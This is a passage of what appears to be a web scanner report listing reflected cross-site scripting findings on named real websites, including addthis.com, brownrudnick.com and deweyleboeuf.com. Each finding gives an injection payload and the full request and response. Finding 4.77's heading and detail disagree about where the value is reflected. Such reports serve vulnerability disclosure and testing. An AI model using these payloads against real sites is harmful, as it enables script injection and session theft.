4.76. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21282"-alert(1)-"db41275acf8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php21282"-alert(1)-"db41275acf8 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 17 Apr 2011 14:20:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=mhkqrnaugp5kh6nhs0b28hgum2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php21282"-alert(1)-"db41275acf8";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

4.77. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The reflected value is not a query-string parameter name: the request carries no query string, and the trailing path segment /1af27"-alert(1)-"3d4039de95d (the path info after bookmark.php) is copied into a JavaScript string which is encapsulated in double quotation marks and then passed to gaPageTracker._trackPageview(u). The payload 1af27"-alert(1)-"3d4039de95d was submitted in that path segment. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php/1af27"-alert(1)-"3d4039de95d HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93891

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/1af27"-alert(1)-"3d4039de95d";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

4.78. http://www.aerosocial.com/user_share.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aerosocial.com
Path:   /user_share.php

Issue detail

The value of REST URL parameter 1 is copied into a single-quoted JavaScript string that sits inside the double-quoted onchange attribute of a <select> element. The payload a8bd0"><img%20src%3da%20onerror%3dalert(1)>464ed54e568 was submitted in the REST URL parameter 1. This input was echoed URL-decoded, as a8bd0"><img src=a onerror=alert(1)>464ed54e568, in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The double quote ends the onchange attribute before the JavaScript inside it is ever parsed, so the injected <img> element is created by the HTML parser and its onerror event handler introduces arbitrary JavaScript into the document; the JavaScript string context is never broken.

Request

GET /user_share.phpa8bd0"><img%20src%3da%20onerror%3dalert(1)>464ed54e568 HTTP/1.1
Host: www.aerosocial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:13 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: PHPSESSID=280e607399294214bca721ea793af478; path=/
Set-Cookie: se_language_autodetected=1; path=/
Content-Language: en
Content-Type: text/html
Content-Length: 21847


<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
<title>aero - the
...[SNIP]...
<select class='small' name='user_language_id' onchange="window.location.href='/profile.php?user=user_share.phpa8bd0"><img src=a onerror=alert(1)>464ed54e568&lang_id='+this.options[this.selectedIndex].value;">
...[SNIP]...

4.79. http://www.alltagz.de/bookmarks/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.alltagz.de
Path:   /bookmarks/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fba2"><script>alert(1)</script>0eb25d2f987 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmarks5fba2"><script>alert(1)</script>0eb25d2f987/ HTTP/1.1
Host: www.alltagz.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:20:52 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.5.1 mod_fastcgi/2.4.2 PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny10
Set-Cookie: PHPSESSID=f31196949f4a929d05a4fc5fde49f9a0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>alltagz: Favoriten online
...[SNIP]...
<a href="/bookmarks5fba2"><script>alert(1)</script>0eb25d2f987">
...[SNIP]...

4.80. http://www.allvoices.com/post_event [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /post_event

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2a48"><script>alert(1)</script>d40146f6281 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post_eventd2a48"><script>alert(1)</script>d40146f6281 HTTP/1.1
Host: www.allvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:20:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
X-QueryCount: 2
X-Runtime: 393ms
Pragma: no-cache
X-QueryRuntime: 0.00659
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Set-Cookie: _T_=byyxux8ut5qtqk1zlo97ex6rd; path=/; expires=Mon, 18 Apr 2011 02:20:53 GMT
Set-Cookie: page_url=http%3A%2F%2Fwww.allvoices.com%2Fpost_eventd2a48%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed40146f6281; path=/
Set-Cookie: masala_session_id=ca361ecf3d65fa664236be822f977a79; path=/
Content-Length: 27741
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<meta property="og:url" content="http://www.allvoices.com/post_eventd2a48"><script>alert(1)</script>d40146f6281"/>
...[SNIP]...

4.81. http://www.automasterlandrover.com/smartbrowse/ajax/new.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.automasterlandrover.com
Path:   /smartbrowse/ajax/new.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload 6a13d</noscript><script>alert(1)</script>7af8498f72f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse6a13d</noscript><script>alert(1)</script>7af8498f72f/ajax/new.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=false&showBodyStyle=false&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.automasterlandrover.com
Proxy-Connection: keep-alive
Referer: http://www.automasterlandrover.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63d606fa404638d9008b915da9d34eb2; JSESSIONID=1o9ay8sxhs37r; ddcpoolid=CmsPoolN; __utmz=1.1303052219.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=1.1930152101.1303052219.1303052219.1303052219.1; __utmc=1; __utmb=1.2.10.1303052219

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-8.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14379
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:57:09 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms9.pub.wc.dealer.ddc p7070 -->

   <title>The Automaster Land Rover | New Land Rover dealership in Shelburne, VT 05482</title
...[SNIP]...
</script>c5f2daa69&amp;20=www.automasterlandrover.com&amp;21=/smartbrowse6a13d</noscript><script>alert(1)</script>7af8498f72f/ajax/new.htm&amp;50=63d606fa404638d9008b915da9d34eb2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-
...[SNIP]...

4.82. http://www.automasterlandrover.com/smartbrowse/ajax/new.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.automasterlandrover.com
Path:   /smartbrowse/ajax/new.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload ff7f2</noscript><script>alert(1)</script>16ce2972f0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse/ajaxff7f2</noscript><script>alert(1)</script>16ce2972f0d/new.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=false&showBodyStyle=false&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.automasterlandrover.com
Proxy-Connection: keep-alive
Referer: http://www.automasterlandrover.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63d606fa404638d9008b915da9d34eb2; JSESSIONID=1o9ay8sxhs37r; ddcpoolid=CmsPoolN; __utmz=1.1303052219.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=1.1930152101.1303052219.1303052219.1303052219.1; __utmc=1; __utmb=1.2.10.1303052219

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-8.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14379
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:57:09 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms9.pub.wc.dealer.ddc p7070 -->

   <title>The Automaster Land Rover | New Land Rover dealership in Shelburne, VT 05482</title
...[SNIP]...
</script>c5f2daa69&amp;20=www.automasterlandrover.com&amp;21=/smartbrowse/ajaxff7f2</noscript><script>alert(1)</script>16ce2972f0d/new.htm&amp;50=63d606fa404638d9008b915da9d34eb2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10&
...[SNIP]...

4.83. http://www.bibsonomy.org/BibtexHandler [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bibsonomy.org
Path:   /BibtexHandler

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7912f"><script>alert(1)</script>ffb7212d2e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BibtexHandler7912f"><script>alert(1)</script>ffb7212d2e4 HTTP/1.1
Host: www.bibsonomy.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:21:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en
Via: 1.1 www.bibsonomy.org, 1.1 www.bibsonomy.org
X-Pingback: http://scraper.bibsonomy.org/xmlrpc
Vary: Accept-Encoding
Connection: close
Content-Length: 8080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; cha
...[SNIP]...
<a href="/BibtexHandler7912f"><script>alert(1)</script>ffb7212d2e4?lang=de">
...[SNIP]...

4.84. http://www.blurpalicious.com/submit/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blurpalicious.com
Path:   /submit/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc96"style%3d"x%3aexpression(alert(1))"9670aa4b70 was submitted in the REST URL parameter 1. This input was echoed as bbc96"style="x:expression(alert(1))"9670aa4b70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submitbbc96"style%3d"x%3aexpression(alert(1))"9670aa4b70/ HTTP/1.1
Host: www.blurpalicious.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=d4f1d7c3f1f6f498ed8932dfa3207b2f; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<meta name="keywords" content="submitbbc96"style="x:expression(alert(1))"9670aa4b70 online, submitbbc96"style="x:expression(alert(1))"9670aa4b70 review, submitbbc96"style="x:expression(alert(1))"9670aa4b70 free, submitbbc96"style="x:expression(alert(1))"9670aa4b70 information, submit
...[SNIP]...

4.85. http://www.brownrudnick.com/bio/srchrslt_alpha.asp [LName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /bio/srchrslt_alpha.asp

Issue detail

The value of the LName request parameter is copied into the HTML document as plain text between tags. The payload 2273c<script>alert(1)</script>da3fa89dfa4 was submitted in the LName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bio/srchrslt_alpha.asp?LName=A2273c<script>alert(1)</script>da3fa89dfa4 HTTP/1.1
Host: www.brownrudnick.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSSSASTRS=FHKLAMJAAMPCLADDLOGDPJOG;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 15:07:33 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 11529
Content-Type: text/html
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Professional Directory</t
...[SNIP]...
<b> &quot;A2273c<script>alert(1)</script>da3fa89dfa4&quot;</b>
...[SNIP]...

4.86. http://www.brownrudnick.com/disc/cntcdisclaimer.asp [ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /disc/cntcdisclaimer.asp

Issue detail

The value of the ID request parameter is copied into the HTML document as plain text between tags. The payload cf64e<script>alert(1)</script>e02f267a586 was submitted in the ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /disc/cntcdisclaimer.asp?ID=461cf64e<script>alert(1)</script>e02f267a586 HTTP/1.1
Host: www.brownrudnick.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSSSASTRS=FHKLAMJAAMPCLADDLOGDPJOG;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 15:09:56 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 12696
Content-Type: text/html
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Notice</title>
<link rel
...[SNIP]...
</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(ID = 461cf64e<script>alert(1)</script>e02f267a586)'.<br>
...[SNIP]...

4.87. http://www.brownrudnick.com/nr/articlesIndv.asp [ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /nr/articlesIndv.asp

Issue detail

The value of the ID request parameter is copied into the HTML document as plain text between tags. The payload f0bd0<script>alert(1)</script>ba5591b9a23 was submitted in the ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nr/articlesIndv.asp?ID=554f0bd0<script>alert(1)</script>ba5591b9a23 HTTP/1.1
Host: www.brownrudnick.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSSSASTRS=FHKLAMJAAMPCLADDLOGDPJOG;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 14:47:37 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 11223
Content-Type: text/html
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Articles</title>
<link r
...[SNIP]...
</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(ID = 554f0bd0<script>alert(1)</script>ba5591b9a23)'.<br>
...[SNIP]...

4.88. http://www.colivia.de/submit.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colivia.de
Path:   /submit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f132"%20style%3dx%3aexpression(alert(1))%207970fd9dcc1 was submitted in the REST URL parameter 1. This input was echoed as 8f132\" style=x:expression(alert(1)) 7970fd9dcc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /submit.php8f132"%20style%3dx%3aexpression(alert(1))%207970fd9dcc1 HTTP/1.1
Host: www.colivia.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:22:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=d4fbc49fd988d8deff16e4092aa20bc6; path=/
Connection: close
Content-Type: text/html
Content-Length: 13901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<a href="/upcoming.php?category=submit.php8f132\" style=x:expression(alert(1)) 7970fd9dcc1">
...[SNIP]...

4.89. http://www.deweyleboeuf.com/en/Firm/MediaCenter/PressReleases.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Firm/MediaCenter/PressReleases.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14c61"><script>alert(1)</script>6973c4e8044 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Firm/MediaCenter/PressReleases.aspx?14c61"><script>alert(1)</script>6973c4e8044=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:42:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 89927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?14c61"><script>alert(1)</script>6973c4e8044=1&pg=1">
...[SNIP]...

4.90. http://www.deweyleboeuf.com/en/Ideas/ClientAlerts.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/ClientAlerts.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e2cd"><script>alert(1)</script>6a3943ac963 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/ClientAlerts.aspx?2e2cd"><script>alert(1)</script>6a3943ac963=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:43:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 78019


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?2e2cd"><script>alert(1)</script>6a3943ac963=1&pg=1">
...[SNIP]...

4.91. http://www.deweyleboeuf.com/en/Ideas/Events.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/Events.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e4bd"><script>alert(1)</script>7eca4c40787 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/Events.aspx?9e4bd"><script>alert(1)</script>7eca4c40787=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:43:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 92994


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?9e4bd"><script>alert(1)</script>7eca4c40787=1&pg=1">
...[SNIP]...

4.92. http://www.deweyleboeuf.com/en/Ideas/Events/EventArchive.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/Events/EventArchive.aspx

Issue detail

